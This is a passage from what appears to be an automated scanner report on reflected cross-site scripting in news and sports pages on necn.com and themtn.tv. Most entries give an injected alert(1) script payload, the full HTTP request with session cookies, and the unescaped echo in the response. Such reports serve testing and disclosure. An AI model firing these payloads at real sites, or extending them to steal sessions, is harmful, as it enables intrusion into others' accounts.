HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=e8c9d91d47e0f31b790659bbf41ca672; path=/ Expires: Sun, 19 Dec 2010 18:43:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing1fbc3"><script>alert(1)</script>8d5270c27c8/landing.html"> ...[SNIP]...
2.532. http://www.necn.com/12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9f5d2"><script>alert(1)</script>0cd921c4439 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Man-in-custody-for-Taunton-Mass-stabbing/landing.html?9f5d2"><script>alert(1)</script>0cd921c4439=1 HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44852 Content-Type: text/html Set-Cookie: PHPSESSID=09f0a5b1844615e3b04c6d13ab6e3122; path=/ Expires: Sun, 19 Dec 2010 18:42:55 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:42:55 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="9f5d2"><script>alert(1)</script>0cd921c4439" id = "9f5d2"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3fe03"><script>alert(1)</script>f9d7a14be0a was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /123fe03"><script>alert(1)</script>f9d7a14be0a/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=9bc0ec5f4bd8ad827ce4d8bffa25ce73; path=/ Expires: Sun, 19 Dec 2010 18:43:01 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:01 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/123fe03"><script>alert(1)</script>f9d7a14be0a/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cfb4d"><script>alert(1)</script>c05fe6991af was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19cfb4d"><script>alert(1)</script>c05fe6991af/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=a3809f6928c3b3f369e3a33342053db4; path=/ Expires: Sun, 19 Dec 2010 18:43:02 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:02 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19cfb4d"><script>alert(1)</script>c05fe6991af/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload be646"><script>alert(1)</script>c703651383b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10be646"><script>alert(1)</script>c703651383b/Memorial-Bridge-reopens-ahead-of-schedul/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44846 Content-Type: text/html Set-Cookie: PHPSESSID=8851f21148f3ff01ea7be5b8f3420ce4; path=/ Expires: Sun, 19 Dec 2010 18:43:04 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:04 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10be646"><script>alert(1)</script>c703651383b/Memorial-Bridge-reopens-ahead-of-schedul/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d48d6"><script>alert(1)</script>90a1948cf94 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Memorial-Bridge-reopens-ahead-of-scheduld48d6"><script>alert(1)</script>90a1948cf94/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44827 Content-Type: text/html Set-Cookie: PHPSESSID=dd8b2d9e649890dcb845960a53659158; path=/ Expires: Sun, 19 Dec 2010 18:43:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:05 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Memorial-Bridge-reopens-ahead-of-scheduld48d6"><script>alert(1)</script>90a1948cf94/landing.html"> ...[SNIP]...
2.537. http://www.necn.com/12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 56cb5"><script>alert(1)</script>8f530fb264b was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Memorial-Bridge-reopens-ahead-of-schedul/landing.html?56cb5"><script>alert(1)</script>8f530fb264b=1 HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44852 Content-Type: text/html Set-Cookie: PHPSESSID=f4ec1720e971c572d17673dfaeda3d74; path=/ Expires: Sun, 19 Dec 2010 18:43:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:00 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="56cb5"><script>alert(1)</script>8f530fb264b" id = "56cb5"> ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 916b0"><script>alert(1)</script>e6f6bbfb313 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12916b0"><script>alert(1)</script>e6f6bbfb313/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44807 Content-Type: text/html Set-Cookie: PHPSESSID=c0eec1dfd3f848e6aa7ba54853b82d70; path=/ Expires: Sun, 19 Dec 2010 18:43:08 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:08 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12916b0"><script>alert(1)</script>e6f6bbfb313/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html"> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c822c"><script>alert(1)</script>f826765c263 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19c822c"><script>alert(1)</script>f826765c263/10/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44826 Content-Type: text/html Set-Cookie: PHPSESSID=b75bc57ca65d1a6b877b11f6f63977b7; path=/ Expires: Sun, 19 Dec 2010 18:43:10 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:10 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19c822c"><script>alert(1)</script>f826765c263/10/Sunday-noon-forecast-Sun-and-clouds/landing.html"> ...[SNIP]...
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6187b"><script>alert(1)</script>c5c12a29ef2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/106187b"><script>alert(1)</script>c5c12a29ef2/Sunday-noon-forecast-Sun-and-clouds/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44826 Content-Type: text/html Set-Cookie: PHPSESSID=d1b2480b54dd714fec748124a145ea4c; path=/ Expires: Sun, 19 Dec 2010 18:43:11 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:11 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/106187b"><script>alert(1)</script>c5c12a29ef2/Sunday-noon-forecast-Sun-and-clouds/landing.html"> ...[SNIP]...
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload da433"><script>alert(1)</script>a79d95431e9 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Sunday-noon-forecast-Sun-and-cloudsda433"><script>alert(1)</script>a79d95431e9/landing.html HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44807 Content-Type: text/html Set-Cookie: PHPSESSID=993fc4cf2c9fc1823580a8d1634c340b; path=/ Expires: Sun, 19 Dec 2010 18:43:13 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:13 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <form ID='formInvisible' action="/12/19/10/Sunday-noon-forecast-Sun-and-cloudsda433"><script>alert(1)</script>a79d95431e9/landing.html"> ...[SNIP]...
2.542. http://www.necn.com/12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html [name of an arbitrarily supplied request parameter]previousnext
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 76aaa"><script>alert(1)</script>d7c53140d3d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /12/19/10/Sunday-noon-forecast-Sun-and-clouds/landing.html?76aaa"><script>alert(1)</script>d7c53140d3d=1 HTTP/1.1 Host: www.necn.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close
Response
HTTP/1.1 200 OK Server: Apache Content-Length: 44832 Content-Type: text/html Set-Cookie: PHPSESSID=4b1c491167faac6fb29e9f413216dfa9; path=/ Expires: Sun, 19 Dec 2010 18:43:07 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:07 GMT Connection: close
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/2008/fbml"> <head> ...[SNIP]... <input type=hidden name="76aaa"><script>alert(1)</script>d7c53140d3d" id = "76aaa"> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload c2ee0<script>alert(1)</script>a3a193b31c8 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.htmlc2ee0<script>alert(1)</script>a3a193b31c8 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:43:58 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:58 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/04/27/10/MBK-Rebel-Matt-Shaw-to-miss-final-season/landing.htmlc2ee0<script>alert(1)</script>a3a193b31c8"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 5d2c0<script>alert(1)</script>14cd630e01 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html5d2c0<script>alert(1)</script>14cd630e01 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:43:56 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:43:56 GMT Content-Length: 800 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/05/11/10/MGLF-CSU-Claims-Mountain-West-Title/landing.html5d2c0<script>alert(1)</script>14cd630e01"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4a1ab<script>alert(1)</script>a5e8593ef26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html4a1ab<script>alert(1)</script>a5e8593ef26 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:00 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:00 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/05/19/10/CSU-Hosts-first-annual-Football-101-for-/landing.html4a1ab<script>alert(1)</script>a5e8593ef26"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload aee88<script>alert(1)</script>66515e37b26 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.htmlaee88<script>alert(1)</script>66515e37b26 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:05 GMT Content-Length: 796 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/05/19/10/FB-Unga-Will-Not-Return-To-BYU/landing.htmlaee88<script>alert(1)</script>66515e37b26"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b5a3d<script>alert(1)</script>e27c1e73d8a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /06/01/10/Around-the-Mountain---Air-Force-Football/landing.htmlb5a3d<script>alert(1)</script>e27c1e73d8a HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:06 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:06 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/01/10/Around-the-Mountain---Air-Force-Football/landing.htmlb5a3d<script>alert(1)</script>e27c1e73d8a"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload b8478<script>alert(1)</script>4fcf470c6ed was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.htmlb8478<script>alert(1)</script>4fcf470c6ed HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:05 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:05 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/01/10/Top-5-Plays-of-the-Year-Air-Force-Falcon/landing.htmlb8478<script>alert(1)</script>4fcf470c6ed"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 4e583<script>alert(1)</script>196f3d11a89 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html4e583<script>alert(1)</script>196f3d11a89 HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:12 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:12 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/14/10/Top-5-Plays-of-the-Year-Colorado-State-R/landing.html4e583<script>alert(1)</script>196f3d11a89"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload ced3f<script>alert(1)</script>560af78acbc was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.htmlced3f<script>alert(1)</script>560af78acbc HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:09 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:09 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/16/10/Around-the-Mountain-CSU-Edition-img-srch/landing.htmlced3f<script>alert(1)</script>560af78acbc"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 957b5<script>alert(1)</script>c69e7af782e was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html957b5<script>alert(1)</script>c69e7af782e HTTP/1.1 Host: www.themtn.tv Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: __utmz=27094392.1292783249.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); PHPSESSID=21fb8bc523fbb9fbdf2ddc03244fe562; __utma=27094392.2014508433.1292783249.1292783249.1292783249.1; __utmc=27094392; __utmb=27094392;
Response
HTTP/1.1 404 Not Found Server: Apache Content-Type: text/html Expires: Sun, 19 Dec 2010 18:44:20 GMT Cache-Control: max-age=0, no-cache, no-store Pragma: no-cache Date: Sun, 19 Dec 2010 18:44:20 GMT Content-Length: 806 Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-T ...[SNIP]... <strong>"/06/16/10/Watch-The-TCU-Press-Conference-Live-at-1/landing.html957b5<script>alert(1)</script>c69e7af782e"</strong> ...[SNIP]...
The value of REST URL parameter 5 is copied into the HTML document as plain text between tags. The payload 38a51<script>alert(1)</script>09a6ef307a1 was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
